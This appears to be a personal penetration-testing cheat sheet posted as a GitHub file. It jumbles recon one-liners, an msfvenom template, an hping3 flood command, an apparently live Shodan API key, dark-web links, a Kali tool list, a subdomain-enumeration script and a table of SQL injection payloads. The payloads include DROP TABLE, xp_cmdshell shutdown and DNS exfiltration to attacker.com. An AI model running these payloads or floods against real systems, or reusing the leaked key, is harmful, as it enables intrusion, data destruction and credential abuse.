-
Notifications
You must be signed in to change notification settings - Fork 0
/
🖋 PenFlo
375 lines (293 loc) · 10.6 KB
/
🖋 PenFlo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
Cloud_enum
usage: Let’s say you were researching “somecompany” whose website is “somecompany.io” that makes a product called “blockchaindoohickey”. You could run the tool like this:
<cloudenum.py -k somecompany -k somecompany.io -k blockchaindoohickey>
(root㉿odus)-[~/ITWSV]
./update.sh
-
sniper -t 169.0.229.126 -fp
nuclei -u domain.tld -sa
amass [enum] [intel] -d <target>
theHarvester -d <target> -b all #Use IP's here to scan in nmap
nmap -sS -sV <-sC> -Pn --script vuln <target> -d <spoodomain> --spoof-mac B3-67-YT-MA-N8-09
msfvenom -p <payload> LHOST<target> -f <filetype> -o <saveas>
nslookup enum
host -l ns <domain>
hping3 -i --flood -n -V -2 -a <--rand-dest> -f -U -R -j
SHODAN APi: IFtePo9C6fNxm3ioAoCTsuhXqCX9Kywo
#Locate all .bat file c:\
#Pshell
Start -sleep 5
Get-ChildItem -Path C:\ -Filter *.bat -verbose -recurse -force
https://github.com/topics/kali-linux-hacking
http://hacktowns3sba2xavxecm23aoocvzciaxirh3vekg2ovzdjgjxedfvqd.onion/misc.php?action=ACT0-3
https://vulners.com/cbl_mariner/CBLMARINER:13208
dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad[.]onion/post/cedc0f1054d73128e8e2
https://www.hiremaster.ai/tracking/conversion.js
https://incogniton.com/download-incogniton/
#
Pattern/Technique
Description
Example
1
Tautology-Based Injection
Injecting tautological conditions to bypass authentication or extract data
OR '1'='1
2
Union-Based Injection
Using UNION SQL operator to combine results of two or more SELECT statements
; UNION SELECT username, password FROM users--
3
Error-Based Injection
Forcing the database to generate an error that reveals information
; SELECT * FROM users WHERE id=1 AND 1=CONVERT(int, (SELECT @@version))--
4
Blind SQL Injection
Extracting data based on true/false responses
AND 1=(SELECT CASE WHEN (username='admin') THEN 1 ELSE 0 END)--
5
Time-Based Blind Injection
Using time delays to infer information
AND IF(1=1, SLEEP(5), 0)--
6
Second-Order Injection
Injecting malicious SQL code that gets executed in a subsequent query
INSERT INTO users (username) VALUES ('admin'); -- Then later used in another query
7
Stacked Queries
Executing multiple SQL queries in one statement
; DROP TABLE users;--
8
Out-of-Band Injection
Using features like DNS or HTTP to exfiltrate data
; EXEC master..xp_dirtree '\\attacker.com\share'--
9
Conditional Errors
Using conditional statements to generate errors revealing data
; SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END--
10
Boolean-Based Blind
Using boolean conditions to infer information
AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username='admin')='a'--
11
Hexadecimal Encoding
Using hex-encoded values in injection
; UNION SELECT 0x70617373776f7264--
12
Comment Injection
Terminating legitimate SQL statements with comments
OR '1'='1'--
13
Function Call Injection
Calling database functions to exploit vulnerabilities
; EXEC xp_cmdshell('dir')--
14
Variable Manipulation
Modifying session or application variables to influence SQL queries
; @var = '1'; EXEC('SELECT * FROM users WHERE id=' + @var)--
15
Batched Queries
Injecting multiple queries in one statement
; SELECT * FROM users; DROP TABLE logs;--
16
Metadata Injection
Extracting database metadata information
; SELECT table_name FROM information_schema.tables--
17
XML Injection
Injecting SQL through XML data processing
</tag><tag>'); DROP TABLE users;--
18
Cookie-Based Injection
Injecting SQL through manipulated cookies
cookie='; DROP TABLE users;--
19
Header-Based Injection
Injecting SQL through manipulated HTTP headers
User-Agent: '; DROP TABLE users;--
20
Direct OS Command Injection
Using SQL to execute OS commands
; EXEC xp_cmdshell('shutdown -s')--
above/kali-rolling 2.6-0kali1 all
Invisible protocol sniffer for finding vulnerabilities in the network
amap/kali-rolling 5.4-4kali3 amd64
next-generation scanning tool for pentesters
arjun/kali-rolling 2.2.2-1 all
HTTP parameter discovery suite
bruteforce-salted-openssl/kali-rolling 1.4.2-4+b1 amd64
try to find the passphrase for files encrypted with OpenSSL
cloud-enum/kali-rolling 0.7-3 all
Multi-cloud open source intelligence tool
crackmapexec/kali-rolling,now 5.4.0-0kali5 all [installed,automatic]
Swiss army knife for pentesting networks
dnsenum/kali-rolling 1.3.2-1 all
tool to enumerate domain DNS information
dnsmap/kali-rolling 0.36-3 amd64
DNS domain name brute forcing tool
evil-winrm/kali-rolling 3.5-0kali1 all
ultimate WinRM shell for hacking/pentesting
fcrackzip/kali-rolling 1.0-11 amd64
password cracker for zip archives
ffuf/kali-rolling 2.1.0-1 amd64
Fast web fuzzer written in Go (program)
firewalk/kali-rolling 5.0-5+b1 amd64
active reconnaissance network security tool
forensics-all/kali-rolling 3.51 all
Debian Forensics Environment - essential components (metapackage)
forensics-all-gui/kali-rolling 3.51 all
Debian Forensics Environment - GUI components (metapackage)
forensics-extra/kali-rolling 2.53 all
Forensics Environment - extra console components (metapackage)
forensics-extra-gui/kali-rolling 2.53 all
Forensics Environment - extra GUI components (metapackage)
forensics-full/kali-rolling 2.53 all
Full forensics station (metapackage)
gobuster/kali-rolling 3.6.0-1+b1 amd64
Directory/file & DNS busting tool written in Go
goldeneye/kali-rolling 1.2.0+git20191230-2 all
HTTP DoS test tool
hunt/kali-rolling 1.5-9 amd64
advanced packet sniffer and connection intrusion
ibombshell/kali-rolling 0~git20201107-0kali2 all
Dynamic Remote Shell
ident-user-enum/kali-rolling 1.0-0kali3 all
Query ident to determine the owner of a TCP network process
isr-evilgrade/kali-rolling 2.0.9-0kali2 all
Evilgrade framework
kali-debtags/now 0.4 all [installed,local]
Kali-specific debtags
laudanum/kali-rolling 1.0+r36-0kali6 all
Collection of injectable web files
libopentest4j-java/kali-rolling 1.2.0-4 all
Open Test Alliance API
libopentest4j-reporting-java/kali-rolling 0.1.0-M1-2 all
Open Test Reporting
ligolo-ng/kali-rolling 0.5.2-0kali2 amd64
Advanced, yet simple, tunneling/pivoting tool that uses a TUN interface
mitm6/kali-rolling 0.3.0-0kali1 all
pwning IPv4 via IPv6
netdiscover/kali-rolling 0.10-3+b1 amd64
active/passive network address scanner using ARP requests
packetsender/kali-rolling 8.6.5-1 amd64
Utility for sending and receiving TCP, UDP, SSL, HTTP packets
packit/kali-rolling 1.8.1-1+b1 amd64
network packet generator and capture tool
payloadsallthethings/kali-rolling 2.1-0kali2 amd64
Collection of useful payloads and bypasses
pompem/kali-rolling,now 0.2.0-6 all [installed]
Exploit and Vulnerability Finder
proxycheck/kali-rolling 0.49a-8 amd64
checks existence of open proxy
python-pyric-doc/kali-rolling 0.1.6+git20191210-0kali1 all
Wireless library for Linux (common documentation)
python3-ajpy/kali-rolling 0.0.5-2 all
Python module to craft AJP requests
python3-ldapdomaindump/kali-rolling,now 0.9.4-2 all [installed,automatic]
Active Directory information dumper via LDAP (Python 3)
python3-pyric/kali-rolling 0.1.6+git20191210-0kali1 all
Wireless library for Linux (Python 3)
redeye/kali-rolling 0.0~git20230722.347f493-0kali2 all
tool to help you manage your data during a pentest operation
redsnarf/kali-rolling 0~git20170822-0kali5 all
Pentesting tool for retrieving credentials from Windows workstations
rekono-kbx/kali-rolling 1.6.6 amd64
automation platform for pentesting
windows-binaries/kali-rolling 0.6.10 all
Various pentesting Windows binaries
winregfs/kali-rolling 0.7-5 amd64
Windows registry FUSE filesystem
https://catalog.workshops.aws/serverless-patterns/en-US/initial-setup
https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html
https://docs.pwncat.org/en/latest/usage/portscanning.html
To create a PowerShell script that enumerates subdomains of a given site and outputs the results to an HTML file, you can follow these steps. We will use the `Invoke-WebRequest` cmdlet to perform DNS queries and extract subdomains. Here’s an example script:
### Step 1: Define the Script
```powershell
# Define the target domain
$targetDomain = "example.com"
# Define the list of common subdomains to check
$subdomains = @("www", "mail", "blog", "shop", "dev", "api", "test", "staging", "beta")
# Initialize an array to hold the results
$results = @()
# Enumerate subdomains
foreach ($subdomain in $subdomains) {
$fullDomain = "$subdomain.$targetDomain"
try {
$response = Resolve-DnsName -Name $fullDomain -ErrorAction Stop
if ($response) {
$results += [PSCustomObject]@{
Subdomain = $fullDomain
IPAddress = $response.IPAddress
}
}
} catch {
# Handle errors (e.g., subdomain does not exist)
}
}
# Generate HTML output
$html = @"
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Subdomain Enumeration Results</title>
<style>
table {
width: 100%;
border-collapse: collapse;
}
table, th, td {
border: 1px solid black;
}
th, td {
padding: 10px;
text-align: left;
}
th {
background-color: #f2f2f2;
}
</style>
</head>
<body>
<h1>Subdomain Enumeration Results for $targetDomain</h1>
<table>
<tr>
<th>Subdomain</th>
<th>IP Address</th>
</tr>
"@
foreach ($result in $results) {
$html += @"
<tr>
<td>$($result.Subdomain)</td>
<td>$($result.IPAddress)</td>
</tr>
"@
}
$html += @"
</table>
</body>
</html>
"@
# Output HTML to file
$outputFile = "subdomains_$($targetDomain).html"
$html | Out-File -FilePath $outputFile
Write-Host "Subdomain enumeration completed. Results saved to $outputFile"
```
### Step 2: Run the Script
1. Open PowerShell.
2. Copy and paste the script into your PowerShell console or save it as a `.ps1` file (e.g., `EnumerateSubdomains.ps1`).
3. Execute the script by running:
```powershell
.\EnumerateSubdomains.ps1
```
### Explanation
- The script defines a list of common subdomains to check against the target domain.
- It uses `Resolve-DnsName` to check if each subdomain exists.
- If a subdomain exists, it stores the subdomain and its IP address in an array.
- The script then generates an HTML file containing the results, formatted in a table.
- Finally, the script outputs the HTML to a file named `subdomains_<targetDomain>.html`.
https://cyberdefenders.org/online-labs/6133c324-7aef-4a75-b1ad-91f92e799ac3/
Curtis Jones, Durham, NC,
Sr. Security Engineer - IAM / Integration Security Consultant
Punctuality, Politeness, and Professionalism are paramount